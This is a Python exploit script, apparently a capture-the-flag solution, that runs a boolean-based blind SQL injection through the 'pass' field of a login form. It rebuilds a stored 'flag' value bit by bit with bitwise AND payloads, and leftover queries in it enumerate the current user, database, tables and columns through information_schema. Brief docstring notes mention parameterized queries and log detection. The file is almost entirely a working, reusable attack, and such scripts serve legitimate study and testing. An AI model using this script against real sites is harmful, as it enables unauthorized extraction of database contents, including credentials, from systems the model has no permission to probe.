Blind SQL injection, recovering each character bit by bit with a bitwise AND
#!/usr/bin/env python3
import requests
# One Session object is reused for every request the script sends.
client = requests.Session()
# When True, get() routes traffic through a local proxy on 127.0.0.1:8080
# so the requests can be inspected.
debug = False
def get(url, data, headers=None):
    """Send a GET through the shared ``client`` session with a fixed browser
    User-Agent.

    Args:
        url: Request URL.
        data: Mapping sent as the query string (``params``).
        headers: Optional header dict. A falsy value is replaced by a fresh
            dict; a non-empty caller-supplied dict is mutated in place
            (its ``User-Agent`` entry is overwritten).

    Returns:
        The response object returned by ``client.get``.
    """
    hdrs = headers or {}
    hdrs['User-Agent'] = (
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 '
        '(KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'
    )
    kwargs = {'params': data, 'headers': hdrs}
    # Only with the module-level ``debug`` flag set is the request routed
    # through the local HTTP proxy; otherwise it goes out directly.
    if debug:
        kwargs['proxies'] = {'http': 'http://127.0.0.1:8080'}
    return client.get(url, **kwargs)
def exp():
    """Recover a database value one bit at a time through a boolean-based blind
    SQL injection in the ``pass`` form parameter.

    Reads the module-level ``url`` set under ``__main__``. The first four
    ``query`` assignments below are dead code left from enumerating the schema
    step by step; only the last one is ever sent.

    Defensive notes: the technique depends on the parameter being spliced into
    the SQL text, so parameterized queries remove it entirely. It also
    generates eight near-identical requests per character (about 312 here),
    differing only in the position and bit mask inside the payload, which is a
    distinctive pattern in web-server or WAF logs.
    """
    query = "select user()"
    query = "select database()"
    query = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
    query = "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='bool'"
    query = "select flag from flag limit 1"
    flag = ""
    # SQL substr() positions are 1-based; at most 39 characters are read.
    for index in range(1, 40):
        print(index)
        guess = 0
        # Each character is rebuilt from eight yes/no answers, one per bit.
        for bit in range(8):
            base = pow(2, bit)
            payload = "xx1' or (ord(substr((%s),%d,1))&%d)=0#"%(query, index, base)
            data = {'user':'user', 'pass':payload}
            r = get(url, data=data)
            # print(r.text)
            # The injected OR condition is false exactly when the masked bit is
            # set, so the "wrong" login page indicates a 1 bit.
            if "wrong" in r.text:
                guess += base
        flag += chr(guess)
        print(flag)
if __name__ == "__main__":
    # ``url`` is a module global that exp() reads; this value is a placeholder.
    url = "http://xxxx.com/x.php"
    exp()